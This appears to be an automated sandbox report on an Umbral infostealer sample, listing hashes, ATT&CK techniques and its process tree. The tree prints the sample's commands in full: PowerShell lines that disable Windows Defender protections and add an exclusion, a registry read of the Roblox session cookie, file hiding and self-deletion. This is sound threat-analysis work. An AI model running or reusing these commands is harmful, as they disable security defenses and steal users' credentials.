umbral | 492f241ed1af18331729e305f0c4943366cc399532898554f7169571e34fa2e2

Analysis

max time kernel
91s
max time network
94s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
18-12-2024 06:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vJxj.exe
Size

227KB
MD5

945f3e693c8465494fcb4d208498b4c2
SHA1

8750e7c46ba29ddf303ce39a00b915317c6695b5
SHA256

492f241ed1af18331729e305f0c4943366cc399532898554f7169571e34fa2e2
SHA512

be19a393984e5699170f094c33c2876708d6d8f58910c40b0ced63e5b07bb72447dd6c7bda64d53a5b6b60ecbe1f5afd23e5c32f24efddf775bad839f0c3869e
SSDEEP

6144:+loZMDXU9Zx0kt8X0/PSCsMmp+LSQPL4eBECDjaTC3b8e1m7i:ooZnf0kkPzp+LSQPL4eBECDjash

Score

10^/10

umbral discovery execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/3040-1-0x000001E4C3B80000-0x000001E4C3BC0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4936	powershell.exe
1128	powershell.exe
1148	powershell.exe
2984	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	vJxj.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4800	cmd.exe
3736	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1692	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3736	PING.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3040	vJxj.exe
2984	powershell.exe
2984	powershell.exe
4936	powershell.exe
4936	powershell.exe
1128	powershell.exe
1128	powershell.exe
1140	powershell.exe
1140	powershell.exe
1148	powershell.exe
1148	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3040	vJxj.exe
Token: SeIncreaseQuotaPrivilege	3444	wmic.exe
Token: SeSecurityPrivilege	3444	wmic.exe
Token: SeTakeOwnershipPrivilege	3444	wmic.exe
Token: SeLoadDriverPrivilege	3444	wmic.exe
Token: SeSystemProfilePrivilege	3444	wmic.exe
Token: SeSystemtimePrivilege	3444	wmic.exe
Token: SeProfSingleProcessPrivilege	3444	wmic.exe
Token: SeIncBasePriorityPrivilege	3444	wmic.exe
Token: SeCreatePagefilePrivilege	3444	wmic.exe
Token: SeBackupPrivilege	3444	wmic.exe
Token: SeRestorePrivilege	3444	wmic.exe
Token: SeShutdownPrivilege	3444	wmic.exe
Token: SeDebugPrivilege	3444	wmic.exe
Token: SeSystemEnvironmentPrivilege	3444	wmic.exe
Token: SeRemoteShutdownPrivilege	3444	wmic.exe
Token: SeUndockPrivilege	3444	wmic.exe
Token: SeManageVolumePrivilege	3444	wmic.exe
Token: 33	3444	wmic.exe
Token: 34	3444	wmic.exe
Token: 35	3444	wmic.exe
Token: 36	3444	wmic.exe
Token: SeIncreaseQuotaPrivilege	3444	wmic.exe
Token: SeSecurityPrivilege	3444	wmic.exe
Token: SeTakeOwnershipPrivilege	3444	wmic.exe
Token: SeLoadDriverPrivilege	3444	wmic.exe
Token: SeSystemProfilePrivilege	3444	wmic.exe
Token: SeSystemtimePrivilege	3444	wmic.exe
Token: SeProfSingleProcessPrivilege	3444	wmic.exe
Token: SeIncBasePriorityPrivilege	3444	wmic.exe
Token: SeCreatePagefilePrivilege	3444	wmic.exe
Token: SeBackupPrivilege	3444	wmic.exe
Token: SeRestorePrivilege	3444	wmic.exe
Token: SeShutdownPrivilege	3444	wmic.exe
Token: SeDebugPrivilege	3444	wmic.exe
Token: SeSystemEnvironmentPrivilege	3444	wmic.exe
Token: SeRemoteShutdownPrivilege	3444	wmic.exe
Token: SeUndockPrivilege	3444	wmic.exe
Token: SeManageVolumePrivilege	3444	wmic.exe
Token: 33	3444	wmic.exe
Token: 34	3444	wmic.exe
Token: 35	3444	wmic.exe
Token: 36	3444	wmic.exe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	1140	powershell.exe
Token: SeIncreaseQuotaPrivilege	1828	wmic.exe
Token: SeSecurityPrivilege	1828	wmic.exe
Token: SeTakeOwnershipPrivilege	1828	wmic.exe
Token: SeLoadDriverPrivilege	1828	wmic.exe
Token: SeSystemProfilePrivilege	1828	wmic.exe
Token: SeSystemtimePrivilege	1828	wmic.exe
Token: SeProfSingleProcessPrivilege	1828	wmic.exe
Token: SeIncBasePriorityPrivilege	1828	wmic.exe
Token: SeCreatePagefilePrivilege	1828	wmic.exe
Token: SeBackupPrivilege	1828	wmic.exe
Token: SeRestorePrivilege	1828	wmic.exe
Token: SeShutdownPrivilege	1828	wmic.exe
Token: SeDebugPrivilege	1828	wmic.exe
Token: SeSystemEnvironmentPrivilege	1828	wmic.exe
Token: SeRemoteShutdownPrivilege	1828	wmic.exe
Token: SeUndockPrivilege	1828	wmic.exe
Token: SeManageVolumePrivilege	1828	wmic.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 3040 wrote to memory of 3444	3040	vJxj.exe	77
PID 3040 wrote to memory of 3444	3040	vJxj.exe	77
PID 3040 wrote to memory of 3036	3040	vJxj.exe	80
PID 3040 wrote to memory of 3036	3040	vJxj.exe	80
PID 3040 wrote to memory of 2984	3040	vJxj.exe	82
PID 3040 wrote to memory of 2984	3040	vJxj.exe	82
PID 3040 wrote to memory of 4936	3040	vJxj.exe	84
PID 3040 wrote to memory of 4936	3040	vJxj.exe	84
PID 3040 wrote to memory of 1128	3040	vJxj.exe	86
PID 3040 wrote to memory of 1128	3040	vJxj.exe	86
PID 3040 wrote to memory of 1140	3040	vJxj.exe	88
PID 3040 wrote to memory of 1140	3040	vJxj.exe	88
PID 3040 wrote to memory of 1828	3040	vJxj.exe	90
PID 3040 wrote to memory of 1828	3040	vJxj.exe	90
PID 3040 wrote to memory of 2196	3040	vJxj.exe	92
PID 3040 wrote to memory of 2196	3040	vJxj.exe	92
PID 3040 wrote to memory of 3136	3040	vJxj.exe	94
PID 3040 wrote to memory of 3136	3040	vJxj.exe	94
PID 3040 wrote to memory of 1148	3040	vJxj.exe	96
PID 3040 wrote to memory of 1148	3040	vJxj.exe	96
PID 3040 wrote to memory of 1692	3040	vJxj.exe	98
PID 3040 wrote to memory of 1692	3040	vJxj.exe	98
PID 3040 wrote to memory of 4800	3040	vJxj.exe	100
PID 3040 wrote to memory of 4800	3040	vJxj.exe	100
PID 4800 wrote to memory of 3736	4800	cmd.exe	102
PID 4800 wrote to memory of 3736	4800	cmd.exe	102

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3036	attrib.exe

C:\Users\Admin\AppData\Local\Temp\vJxj.exe
"C:\Users\Admin\AppData\Local\Temp\vJxj.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3040
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3444
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\vJxj.exe"
  2⤵
  - Views/modifies file attributes
  PID:3036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\vJxj.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1140
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1828
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:2196
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:3136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1148
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:1692
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\vJxj.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4800
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
9c85e75200c6bd14a2986b874491b25e

SHA1
0608306628d94fa74c7221dc6892c82dacf460b7

SHA256
a67ce6f2c746eee8bd9e1be61659684b58d25cfc83c4f3e306c12b4e2e812568

SHA512
3b2eecd7d10f2b302332a008b6aa8547607aca47c8f2a1bf454381b5c368ea83a76b100ad567eafa15f37d0af88287fa9dcba625f0217e2ec195bf05e2ee6b5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57083a8e45ebe4fd84c7c0f137ec3e21

SHA1
857b5ea57f7bcf03cadee122106c6e58792a9b84

SHA256
f20102c4dc409cad3cdaf7a330c3a18a730a9d7d902b9fbee2a84186cba93d40

SHA512
4bbc21c07c05ee1f783242f0fb59324d5ff9ae18bdf892f02980d582fed83380888eeba58e1a6a321507cfd5d4fe82a328a0d3482b29633be4e3ebbeac636f87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
22487c530a9aa4388d57329660e4a0f8

SHA1
68c8dd8d803f44a3ea83b10750d0064bcfa0858e

SHA256
e8dd1d02267842c6107ee22cd311e28056bf5c950086922d6cca754587833d4c

SHA512
5e2f09b8d40a0e60acb6b02229e646986dc3e51274f186f3350949f2cc2115a679c28ac8b5bfb1ee4ed41f01b38791b9d3f10abf9491ae3cf195e8104ea7cf68

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2rcgwcx1.x0e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2984-4-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download
memory/2984-5-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download
memory/2984-14-0x0000021FEB6A0000-0x0000021FEB6C2000-memory.dmp

Filesize
136KB

Download
memory/2984-17-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download
memory/2984-3-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download
memory/3040-32-0x000001E4DE330000-0x000001E4DE380000-memory.dmp

Filesize
320KB

Download
memory/3040-31-0x000001E4DE3B0000-0x000001E4DE426000-memory.dmp

Filesize
472KB

Download
memory/3040-33-0x000001E4C59A0000-0x000001E4C59BE000-memory.dmp

Filesize
120KB

Download
memory/3040-1-0x000001E4C3B80000-0x000001E4C3BC0000-memory.dmp

Filesize
256KB

Download
memory/3040-0-0x00007FFD61473000-0x00007FFD61475000-memory.dmp

Filesize
8KB

Download
memory/3040-65-0x000001E4DE1F0000-0x000001E4DE1FA000-memory.dmp

Filesize
40KB

Download
memory/3040-66-0x000001E4DE380000-0x000001E4DE392000-memory.dmp

Filesize
72KB

Download
memory/3040-2-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download
memory/3040-85-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download